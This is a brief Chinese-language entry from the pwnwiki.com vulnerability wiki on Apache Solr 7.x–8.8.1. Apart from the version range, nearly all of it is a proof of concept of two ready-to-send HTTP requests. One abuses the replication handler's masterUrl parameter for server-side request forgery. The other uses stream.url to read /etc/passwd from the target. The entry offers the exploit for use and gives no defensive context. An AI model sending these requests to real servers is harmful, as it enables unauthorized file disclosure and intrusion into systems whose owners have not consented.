pwnwiki.com
,
影响版本
Apache Solr 7.0.0 - 7.7.3 Apache Solr 8.0.0 - 8.8.1
POC
GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1 HOST:target ....
GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 HOST:target ...
PWNWIK.COM==免费、自由、人人可编辑的漏洞库